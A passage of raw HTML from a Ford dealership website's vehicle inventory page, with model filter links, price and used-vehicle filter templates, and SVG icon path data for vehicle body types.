data-jzlbind-image-src="https://a5-gallery.s3-us-west-2.amazonaws.com/2019/Ford/F-150/Reg%20Cab%20Box/front34/sm/0A0A0C"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">F-150 (409)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Black Widow Super Duty F-250 SRW,Ford_F-250 Super Duty,Ford_F-350 Super Duty,Ford_F-450 Super Duty,Ford_Super Duty E-350SD,Ford_Super Duty F-250,Ford_Super Duty F-250 SRW,Ford_Super Duty F-250SD,Ford_Super Duty F-350 DRW,Ford_Super Duty F-350 DRW Chassis Cab,Ford_Super Duty F-350 SRW,Ford_Super Duty F-350SD,Ford_Super Duty F-450 DRW,Ford_Super Duty F-450 Pickup,Ford_Super Duty F-450SD,Ford_Super Duty F-550 DRW,Ford_Super Duty F-650 DRW" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Super Duty" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/SuperDutyXLT_red.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Super Duty (294)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Transit Cargo,Ford_Transit Cargo Van,Ford_Transit Chassis,Ford_Transit Commercial,Ford_Transit Connect,Ford_Transit Connect Cargo,Ford_Transit Connect Commercial,Ford_Transit Connect Van,Ford_Transit Connect Wagon,Ford_Transit Cutaway,Ford_Transit Passenger,Ford_Transit Passenger Wagon,Ford_Transit Van,Ford_Transit Vanwagon,Ford_Transit Wagon,Ford_Transit-150,Ford_Transit-250,Ford_Transit-350" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Transit" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://a5-gallery.s3-us-west-2.amazonaws.com/2018/Ford/Transit%20Connect%20Van/Rear%20w/front34/sm/B0AAA3"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Transit (36)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Ranger" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Ranger" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/RangerXLT_blue.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Ranger (37)</div></a></div></div></div></span></span></div></div><div class="tab-used_vehicles sc-lcpuFF kmtlOc"><div class="sc-fjhmcy dNpUjv" data-jzlbind-list="h('hpsmFiltersState.availableFiltersUsedVehicles.models.items')"><script type="x-tmpl-mustache"><div class="sc-yZwTr fUlKob"><a class="sc-gNJABI kTadoe" href="https://www.5starford.com/inventory/all-vehicles/used+models={{value}}"><span>{{label}} ({{countString}})</span></a></div></script></div></div><div class="tab-price_range sc-hwcHae gKiWum"><div class="sc-fjhmcy kqVJpg" data-jzlbind-list="h('hpsmFiltersState.availableFilters.priceRange.items')"><script type="x-tmpl-mustache"><div class="sc-yZwTr fUlKob"><a class="sc-gNJABI kTadoe" href="https://www.5starford.com/inventory/all-vehicles/price={{value}}"><span>{{label}}</span></a></div></script></div></div><div class="tab-vehicle_type sc-bbkauy dhWUKf"><svg class="sc-fihHvN kgqeXA"><symbol id="convertible" viewBox="0 0 14.77 5.21"><path d="M12.42,8.82a.3.3,0,1,1-.3-.3A.3.3,0,0,1,12.42,8.82ZM6.71,7H5.94v.22h.77ZM3.8,8.52a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.8,8.52Zm1.88-.18v.28h4.66Zm9.16.87-.14,0a4.06,4.06,0,0,1-1.08.1H13.2a1.2,1.2,0,0,1-1.93.33h0A1.2,1.2,0,0,1,11,9.34H4.88a1.21,1.21,0,0,1-.23.33h0a1.2,1.2,0,0,1-1.93-.33H2.38a2.35,2.35,0,0,1-.74-.14H1V8.93L.83,8.82l-.08,0V7.64l0,0a1,1,0,0,0,.14-.42L1,6.12,3,6h.55l.09-.3c0-.14.1-.27.25-.28a.27.27,0,0,1,.28.25l0,.37c.3,0,.57.07.85.11l.7.1a.25.25,0,0,1,0-.17l.09-.3c0-.14.1-.27.25-.28a.27.27,0,0,1,.28.25l0,.4a.21.21,0,0,1-.05.15H9.21a.16.16,0,0,1,.17,0l.09.05h0l.18,0A5.25,5.25,0,0,0,7.94,5.21L8,4.89l.27.06h0L8.5,5a16.16,16.16,0,0,1,2.28,1.18,20.26,20.26,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.64,8.82a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.64,8.82Zm8.32,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13,8.82Zm1.52.12V8.68h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.5a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.12l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74a3.25,3.25,0,0,0-1.13-.49,20.37,20.37,0,0,0-2.36-.41,4.62,4.62,0,0,0-.57.05l-.4,0s0,.06,0,.09a.16.16,0,0,1-.13.08.11.11,0,0,1,0,.15l-.07,0a.11.11,0,0,1-.09,0l-.09-.12H9.23a.16.16,0,0,1-.12,0,.15.15,0,0,1,0-.1H6.15c-.45,0-.81-.09-1.15-.15a8.64,8.64,0,0,0-2-.14l-1.75.09,0,.37h.67V7c0,.23-.37.44-.64.44h-.1a1.65,1.65,0,0,1-.11.27v.85A3.08,3.08,0,0,0,2.38,9V8.75A1.42,1.42,0,0,1,3.8,7.33h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9H10.7V8.75a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9h.08A4.08,4.08,0,0,0,14.48,8.94Z"></path></symbol><symbol id="coupe" viewBox="0 0 14.77 5.21"><path d="M3.95,6.21a5.82,5.82,0,0,1,3-.71A4.48,4.48,0,0,1,9.4,6.3h0a.63.63,0,0,0-.2.43l-4.8-.18A.6.6,0,0,1,3.95,6.21ZM10,6.84a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11L9.71,7a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.84Zm2.24,1.65a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.26,8.49ZM5.72,8.32v.28h4.71ZM6.71,7H5.94v.22h.77Zm8,2.22-.14,0a3.87,3.87,0,0,1-.92.1h-.34a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.87a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H2.38v0A2.3,2.3,0,0,1,2,9.24H1.24V9L.95,8.79l-.08,0v-1l.05,0a.75.75,0,0,0,.22-.39l0-1.06L2.3,6.1A8.65,8.65,0,0,1,6.87,5a5.29,5.29,0,0,1,3,1l.67.38a13.27,13.27,0,0,1,2.49.31c.92.24,1.51.55,1.58.84ZM4.64,8.8a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.64,8.8Zm8.46,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.1,8.8Zm1.28.12V8.57h-.14a.11.11,0,0,1-.1.07H14a.12.12,0,0,1-.12-.12V8.39A.12.12,0,0,1,14,8.27h.16a.11.11,0,0,1,.1.07h.13l0-.57H14a.83.83,0,0,0-.38.1l-.32-.57h.49A5.65,5.65,0,0,0,13,7a13.32,13.32,0,0,0-2.46-.3l-.08,0-.72-.41a5,5,0,0,0-2.84-.95A8.42,8.42,0,0,0,2.42,6.41l-.06,0-.85.08v.18h.68v.22c0,.23-.37.44-.64.44H1.47a1.06,1.06,0,0,1-.26.49v.72A3.22,3.22,0,0,0,2.38,9V8.72a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9h5.63V8.72a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9A3.68,3.68,0,0,0,14.38,8.92ZM3.8,8.49a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.8,8.49Z"></path></symbol><symbol id="crossover" viewBox="0 0 14.77 5.21"><path d="M5.66,5.28H7.77A11.31,11.31,0,0,1,11,6.7L9.88,6.64a.27.27,0,0,0,0-.13.78.78,0,0,0-.41-.34.27.27,0,0,0-.28.06h0A.57.57,0,0,0,9,6.6C7,6.51,5.11,6.45,3,6.45A3,3,0,0,1,5.66,5.28Zm5.89,3.13a.27.27,0,1,0,.27.27A.27.27,0,0,0,11.55,8.41Zm-7.24,0a.27.27,0,1,0,.27.27A.27.27,0,0,0,4.31,8.41ZM13.8,9l-.14,0a3.7,3.7,0,0,1-.83.1h-.32a1.06,1.06,0,0,1-1.93,0H5.28a1.08,1.08,0,0,1-1.74.29,1.09,1.09,0,0,1-.2-.29H3a2.23,2.23,0,0,1-1.35-.54l-.05,0v-1l0,0a3.81,3.81,0,0,0,.25-.86L2,6.36c.08-.31,1-.87,1.33-1.08L3.11,5l.25,0a18.09,18.09,0,0,1,2.3-.16H7.79a13.68,13.68,0,0,1,3.86,1.61,2.54,2.54,0,0,1,2,1l0,.07ZM5.06,8.68a.75.75,0,1,0-.75.75A.75.75,0,0,0,5.06,8.68Zm7.24,0a.75.75,0,1,0-.75.75A.75.75,0,0,0,12.3,8.68Zm1.14.08,0-.33h-.16a.11.11,0,0,1-.1.07H13a.12.12,0,0,1-.12-.12V8.26A.12.12,0,0,1,13,8.14h.16a.11.11,0,0,1,.1.07h.15l0-.57H13.2a.83.83,0,0,0-.38.1l-.32-.57H13a3.18,3.18,0,0,0-1.44-.46l-.07,0A13.48,13.48,0,0,0,7.77,5.11H5.66a17.12,17.12,0,0,0-2,.13l.09.16-.15.08a5.34,5.34,0,0,0-1.32,1l-.06.24h.37v.22c0,.2-.28.37-.52.42a1.91,1.91,0,0,1-.12.33v.76A1.92,1.92,0,0,0,3,8.82V8.61A1.29,1.29,0,0,1,4.31,7.33h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21h4.68V8.61a1.29,1.29,0,0,1,1.28-1.28h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21A3.39,3.39,0,0,0,13.45,8.76ZM7.91,7.05H7.43v.22h.48Zm1.83-.32a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,9.74,6.73ZM5.24,7H4.76v.22h.48Zm.68,1.31v.28H9.59Z"></path></symbol><symbol id="hatchback" viewBox="0 0 14.77 5.21"><path d="M3.53,6.49c.47-.54.88-1,1.51-1H7.56a4.08,4.08,0,0,1,1.77.62h0a.58.58,0,0,0-.18.4.27.27,0,0,0,0,.14A38.64,38.64,0,0,1,3.53,6.49Zm3,.58H6.06v.22h.48Zm3.39-.43a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,9.94,6.64Zm4.15,2.44-.14,0a3.75,3.75,0,0,1-1,.1h-.51a1.06,1.06,0,0,1-1.93,0h-6a1.08,1.08,0,0,1-1.74.29,1.09,1.09,0,0,1-.2-.29H2.31a.85.85,0,0,1-.87-.58v-.8l.05,0a.65.65,0,0,0,.21-.34l0-.48a.49.49,0,0,1,.2-.38l1.34-1-.17-.27.21-.07A4.44,4.44,0,0,1,4.94,5H7.58a5,5,0,0,1,1,.18A14.65,14.65,0,0,1,10.7,6.29c.17,0,1,.16,1.84.38,1.06.27,1.42.7,1.46.89ZM4.35,8.73a.76.76,0,1,0-.22.53A.75.75,0,0,0,4.35,8.73Zm7.88,0a.76.76,0,1,0-.22.53A.75.75,0,0,0,12.23,8.73Zm1.5.09V8.59h-.16a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.41a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.15l0-.57H13.5a.83.83,0,0,0-.38.1l-.32-.57h.5A3.43,3.43,0,0,0,12.45,7c-1-.25-1.83-.38-1.84-.38l-.06,0a15.39,15.39,0,0,0-2-1.07,4.65,4.65,0,0,0-.94-.17H4.94a4.17,4.17,0,0,0-1.34.16l.13.15-.63.8H2.64l-.52.38s0,0,0,0a3.08,3.08,0,0,1,.52-.06c0,.2-.29.53-.29.53H2v.08A.88.88,0,0,1,1.77,8v.59c0,.07.14.29.55.31v-.2A1.29,1.29,0,0,1,3.6,7.38h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21H10.2V8.66a1.29,1.29,0,0,1,1.28-1.28h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21H13A3.77,3.77,0,0,0,13.73,8.82ZM3.6,8.46A.27.27,0,0,0,3.6,9h.07a.27.27,0,0,0-.07-.53Zm1.72-.19v.28H9Zm6.17.19a.27.27,0,1,0,.27.27A.27.27,0,0,0,11.48,8.46Z"></path></symbol><symbol id="hybrid" viewBox="0 0 14.77 5.21"><path d="M9.57,6.13,3.71,6l-.12-.41A10.3,10.3,0,0,1,4.77,5.2,13.77,13.77,0,0,1,7.67,5a5.72,5.72,0,0,1,2.09.69h0a.56.56,0,0,0-.17.39A.32.32,0,0,0,9.57,6.13Zm.74,0a.14.14,0,0,0,0-.15A.59.59,0,0,0,10,5.77a.14.14,0,0,0-.15,0h0a.42.42,0,0,0-.13.29.14.14,0,0,0,.14.15H10l.08.11a.1.1,0,0,0,.08,0l.06,0a.1.1,0,0,0,0-.14A.14.14,0,0,0,10.31,6.18Zm-2.5.3H7.13v.2h.68ZM4.74,6.4H4.06v.2h.68Zm.63,1.55V8.2H10Zm9.14.86-.12,0a3.79,3.79,0,0,1-.89.07h-.32a1.25,1.25,0,0,1-2,.63h0a1.26,1.26,0,0,1-.4-.63H4.66a1.25,1.25,0,0,1-2.42,0H2a1.44,1.44,0,0,1-1-.45l0,0V7.31l0,0a.67.67,0,0,0,.2-.35c0-.12,0-.36,0-.59s0-.36,0-.47V5.73l.68-.08A12.23,12.23,0,0,1,7.68,4.51,7.86,7.86,0,0,1,11,5.84l.26,0c1.61.15,3.12.37,3.26,1ZM4.28,8.58a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.28,8.58Zm8.54,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,12.82,8.58Zm1.4-1.32h-.12a.91.91,0,0,0-.41.11l-.35-.62.82.07c-.23-.26-1.22-.49-2.94-.65l-.29,0-.06,0a7.68,7.68,0,0,0-3.2-1.3A12,12,0,0,0,2,5.93H2L1.54,6c0,.1,0,.21,0,.33H2v.19c0,.2-.29.36-.52.38v0a.85.85,0,0,1-.24.5v.86A1.19,1.19,0,0,0,2,8.6V8.32A1.44,1.44,0,0,1,3.45,6.89h0a1.43,1.43,0,0,1,1,.42h0a1.43,1.43,0,0,1,.42,1v.29h5.67V8.32A1.44,1.44,0,0,1,12,6.89h0a1.43,1.43,0,0,1,1,.42h0a1.43,1.43,0,0,1,.42,1v.29h.1a4,4,0,0,0,.71,0V8.48h-.31a.71.71,0,0,1,0-.29h.35V8h-.55a1.12,1.12,0,0,1,.11-.39h.43ZM12,8.25a.32.32,0,1,0,.33.33A.32.32,0,0,0,12,8.25Zm-8.54,0a.32.32,0,1,0,.33.33A.32.32,0,0,0,3.45,8.25Z"></path></symbol><symbol id="luxury" viewBox="0 0 15.5 5"><path d="M13.06,8.63a.29.29,0,1,1-.29-.29A.29.29,0,0,1,13.06,8.63ZM8.76,6.86H8v.21h.73Zm-3.56,0H4.47v.21H5.2ZM3,8.34a.29.29,0,1,0,.29.29A.29.29,0,0,0,3,8.34Zm1.91-.17v.27h6.17Zm5.9-1.7a.15.15,0,0,0,0-.16A.63.63,0,0,0,10.49,6a.15.15,0,0,0-.16,0h0a.45.45,0,0,0-.14.31.15.15,0,0,0,.15.16h.1l.08.12a.11.11,0,0,0,.09,0l.06,0a.1.1,0,0,0,0-.14A.15.15,0,0,0,10.82,6.47ZM15.35,9l-.13,0a3.86,3.86,0,0,1-1,.1H13.8a1.14,1.14,0,0,1-2.05,0H4A1.14,1.14,0,0,1,2,9.12H1.67A2.23,2.23,0,0,1,1,9H.37V8.73L.2,8.62l-.07,0V7.51l0,0a.94.94,0,0,0,.13-.4L.32,6l1.52-.1.05,0a9.21,9.21,0,0,1,2.93-1H8.29A5.1,5.1,0,0,1,9.35,5a15.11,15.11,0,0,1,2.16,1.12,19.38,19.38,0,0,1,2.25.4c1.09.28,1.45.71,1.5.9ZM3.81,8.63A.79.79,0,1,0,3,9.43.79.79,0,0,0,3.81,8.63Zm9.76,0a.79.79,0,1,0-.79.79A.79.79,0,0,0,13.57,8.63ZM15,8.74V8.49h-.13a.11.11,0,0,1-.09.07h-.16a.11.11,0,0,1-.11-.11V8.33a.11.11,0,0,1,.11-.11h.16a.11.11,0,0,1,.09.07H15l0-.54h-.25a.79.79,0,0,0-.36.09L14,7.3h.7a3.09,3.09,0,0,0-1.07-.46,19.3,19.3,0,0,0-2.24-.39l-.07,0A15.88,15.88,0,0,0,9.25,5.32a4.8,4.8,0,0,0-1-.18H4.82A9.09,9.09,0,0,0,2,6.12l-.14.05L.63,6.26l0,.46h.63v.2c0,.22-.35.42-.61.42H.55a1.58,1.58,0,0,1-.1.26V8.4a2.91,2.91,0,0,0,1.23.4V8.56A1.35,1.35,0,0,1,3,7.22H3A1.34,1.34,0,0,1,4,7.61H4a1.34,1.34,0,0,1,.39.95V8.8h7.07V8.56a1.34,1.34,0,0,1,.39-.95h0a1.34,1.34,0,0,1,.95-.39h0a1.34,1.34,0,0,1,.95.39h0a1.34,1.34,0,0,1,.39.95V8.8h.07A3.87,3.87,0,0,0,15,8.74ZM2.95,6.3a3.11,3.11,0,0,0,1.15.14h.34l.29-1.11A5.28,5.28,0,0,0,2.95,6.3ZM5,5.29H5l-.3,1.13H7.32V5.29Zm5,1.09A.6.6,0,0,1,10.21,6,4.47,4.47,0,0,0,8,5.29H7.54V6.43H10A.32.32,0,0,1,10,6.38Z"></path></symbol><symbol id="minivan" viewBox="0 0 14.77 5.21"><path d="M8.41,4.54a3.57,3.57,0,0,1,1,.17A16.3,16.3,0,0,1,12,6.12l-.49.18-.13,0-1.08,0c-.05-.09-.13-.18-.16-.23a.83.83,0,0,0-.44-.36.32.32,0,0,0-.33.07h0a.63.63,0,0,0-.2.44.32.32,0,0,0,0,0L4,6.07l-1.5-.31L3,4.7A10.35,10.35,0,0,1,4.7,4.54C6,4.54,7.08,4.52,8.41,4.54ZM12,8.14a.3.3,0,1,0,.3.3A.3.3,0,0,0,12,8.14Zm-8.54,0a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.42,8.14ZM7.75,6.48H7.27V6.7h.48ZM4.94,6.37H4.46v.22h.48Zm5-.07a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.3Zm4.78,2.17,0,.36-.22.05a3.08,3.08,0,0,1-.89.08H13a1.19,1.19,0,0,1-1.92.33h0A1.2,1.2,0,0,1,10.89,9H4.49a1.19,1.19,0,0,1-1.92.33h0A1.2,1.2,0,0,1,2.35,9H2v0a1.13,1.13,0,0,1-.92-.57V7.26l0,0a1,1,0,0,0,.14-.42L1.28,6,2,4.73l-.06-.38.15,0A14.28,14.28,0,0,1,4.7,4H5.79C6.7,4,7.72,4,8.44,4a7.51,7.51,0,0,1,3.51,1.44l.54.33.33.09c.81.2,1.82.46,2,1.12V7Zm-10.47,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.26,8.45Zm8.57,0a.87.87,0,0,0-.25-.61h0a.87.87,0,1,0-1.23,1.23h0a.87.87,0,0,0,1.48-.61Zm1.61-1.24c-.34,0-.66,0-.75,0h0a.83.83,0,0,0-.38.06L13,6.57l1.28.21a4.15,4.15,0,0,0-1.54-.61l-.36-.09,0,0-.56-.35A7.27,7.27,0,0,0,8.42,4.32c-.7,0-1.72,0-2.63,0H4.7a13.42,13.42,0,0,0-2.4.29l0,.17-.7,1.33h.72v.27c0,.29-.46.55-.8.55a1.48,1.48,0,0,1-.14.42v.91A.81.81,0,0,0,2,8.61V8.37A1.42,1.42,0,0,1,3.42,7h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h5.71V8.37a1.41,1.41,0,0,1,.42-1h0A1.41,1.41,0,0,1,12,7h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h.27a2.92,2.92,0,0,0,.76-.06V8.3h-.21a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.13A.12.12,0,0,1,13.93,8h.16a.11.11,0,0,1,.1.07h.22ZM5.13,8v.28h5.22Z"></path></symbol><symbol id="sedan" viewBox="0 0 15.5 5"><path d="M4.51,6.59A3.28,3.28,0,0,1,3.3,6.45a4.46,4.46,0,0,1,2.2-1.06H7.33a4.72,4.72,0,0,1,2.34.72.63.63,0,0,0-.19.43.33.33,0,0,0,0,.06ZM8.14,7H7.37v.22h.77ZM4.72,7H4v.22h.77Zm.66,1.38v.28H10.6Zm4.94-1.79a.16.16,0,0,0,0-.16A.67.67,0,0,0,10,6.17a.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10.32,6.63Zm-6.95,2a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.37,8.6Zm11.72.68-.14,0a4.07,4.07,0,0,1-1.08.1h-.42a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.44a1.2,1.2,0,0,1-.22.33h0A1.17,1.17,0,0,1,2.3,9.42H2a2.35,2.35,0,0,1-.74-.14H.58V9L.4,8.9l-.08,0V7.73l0,0a1,1,0,0,0,.14-.42l0-1.17L2.13,6l.06,0A9.72,9.72,0,0,1,5.27,4.89H7.65a5.37,5.37,0,0,1,1.11.2A16,16,0,0,1,11,6.28a20.51,20.51,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.21,8.91a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.21,8.91Zm9,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.21,8.91ZM14.74,9V8.76h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.59a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.12l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74A3.25,3.25,0,0,0,13.33,7,20.37,20.37,0,0,0,11,6.6l-.07,0A16.79,16.79,0,0,0,8.66,5.41a5.07,5.07,0,0,0-1-.19H5.27a9.59,9.59,0,0,0-2.94,1l-.15.06L.85,6.41l0,.48H1.5v.22c0,.23-.37.44-.64.44H.77a1.66,1.66,0,0,1-.11.27v.85A3,3,0,0,0,2,9.09V8.83a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,2,0h0a1.41,1.41,0,0,1,.42,1v.26H11V8.83a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h.08A4.09,4.09,0,0,0,14.74,9ZM12.37,8.6a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.37,8.6Z"></path></symbol><symbol id="sport" viewBox="0 0 15.5 5"><path d="M5.83,5.55l.07.84L4.58,6.1c.53-.35.62-.54,1.24-.54Zm.33,0H8.05a7.68,7.68,0,0,1,1.31.53l0,0h0a.63.63,0,0,0-.19.36H6.24Zm9,1.75,0-.51-.08,0c-.49-.29-1.92-.48-4.36-.57h0A10.65,10.65,0,0,0,8.2,5L8.07,5H5.32a10.23,10.23,0,0,0-2.4.78l-.5.2L1.1,6l-.77-.1L.5,6.5l-.15.63a.87.87,0,0,1-.23.45l0,0v.9l.07,0A6.57,6.57,0,0,0,2,9.24H2l.13,0,.09,0,.09,0h0l.11,0a1.2,1.2,0,0,0,1.92,0h7.46a1.2,1.2,0,0,0,.35.32h0a1.17,1.17,0,0,0,1.56-.37A4.61,4.61,0,0,0,14.89,9L15,9V8.88a.66.66,0,0,0-.08-.27l0,0a1.19,1.19,0,0,0,.44-1V7.48ZM3.41,9.48a.84.84,0,1,1,.84-.84A.84.84,0,0,1,3.41,9.48Zm9.34,0a.84.84,0,1,1,.84-.84A.84.84,0,0,1,12.75,9.48Zm1.92-1.15-.08.08-.05.05v.08a.67.67,0,0,0,.07.21v0a4,4,0,0,1-.45.13V8.68a1.44,1.44,0,0,0-.37-1.05h0a1.42,1.42,0,0,0-1-.36,1.42,1.42,0,0,0-1,.37h0a1.44,1.44,0,0,0-.37,1.05V9H4.83V8.68a1.44,1.44,0,0,0-.37-1.05h0a1.42,1.42,0,0,0-1-.36,1.42,1.42,0,0,0-1,.37h0A1.44,1.44,0,0,0,2,8.68V8.9A7,7,0,0,1,.41,8.35v-.6a1,1,0,0,0,.27-.58l.16-.68L.79,6.3l.29,0,1.37,0h.05L3,6.09a11.55,11.55,0,0,1,2.27-.76H8.1a10.47,10.47,0,0,1,2.42,1.15l0,0h.1A14.1,14.1,0,0,1,14.79,7l0,.47.19.16A.84.84,0,0,1,14.67,8.33Zm-11.26,0a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.41,8.33ZM7.1,6.76H6.33V7H7.1ZM5.38,8.4v.28H10.9Zm7.37-.06a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.75,8.33ZM10,6.64a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.64Z"></path></symbol><symbol id="suv" viewBox="0 0 15.5 5"><path d="M6.52,3.95H8.09a3.18,3.18,0,0,1,1.64.76.34.34,0,0,0-.14.08h0a1.18,1.18,0,0,0-.2.66H6.52ZM2.3,5.46H5.9V3.95H4.62A15.4,15.4,0,0,0,3,4ZM12.5,8a.37.37,0,1,0,.36.37A.37.37,0,0,0,12.5,8ZM3.93,8a.37.37,0,1,0,.36.37A.36.36,0,0,0,3.93,8ZM8,5.75H7.23V6H8Zm7.2,1.76v.63a.4.4,0,0,1-.14.37,1.76,1.76,0,0,1-1,.2h-.25a1.41,1.41,0,0,1-2.27.71h0a1.41,1.41,0,0,1-.45-.71H5.29a1.41,1.41,0,0,1-2.72,0H2.32A3.72,3.72,0,0,1,.71,8L.65,8v-1l.05,0A.73.73,0,0,0,.92,6.5V6.22c0-.19,0-.41,0-.6A.67.67,0,0,1,1.3,5.2a3.49,3.49,0,0,1,.35-.68,3.35,3.35,0,0,0,.18-.33l0-.09L1.9,4V4l0-.29.28-.06a6.69,6.69,0,0,1,1.72-.19H8.11a3.72,3.72,0,0,1,2.14,1,8.85,8.85,0,0,0,.91.67l.62,0c1.52.06,2.9.17,3.06.84L15,7.15A.46.46,0,0,1,15.2,7.51ZM4.87,8.36a.94.94,0,1,0-.94.94A.94.94,0,0,0,4.87,8.36Zm8.57,0a.94.94,0,1,0-.94.94A.94.94,0,0,0,13.44,8.36Zm1.43-.85s-.08-.1-.11-.12l-.08,0V7.25h-.44v-1h.3l0-.11c-.11-.47-1.89-.54-2.74-.57l-.68,0-.07,0a8.9,8.9,0,0,1-1-.72,3.41,3.41,0,0,0-1.94-1H3.85A6.29,6.29,0,0,0,2.22,4a.37.37,0,0,1,0,.28l0,.09a3.6,3.6,0,0,1-.21.36,2.79,2.79,0,0,0-.33.66l0,.09-.09,0a.47.47,0,0,0-.21.19H2v.27c0,.29-.44.54-.78.55v0A1,1,0,0,1,1,7.07V7.8a3.34,3.34,0,0,0,1.35.57v-.3A1.61,1.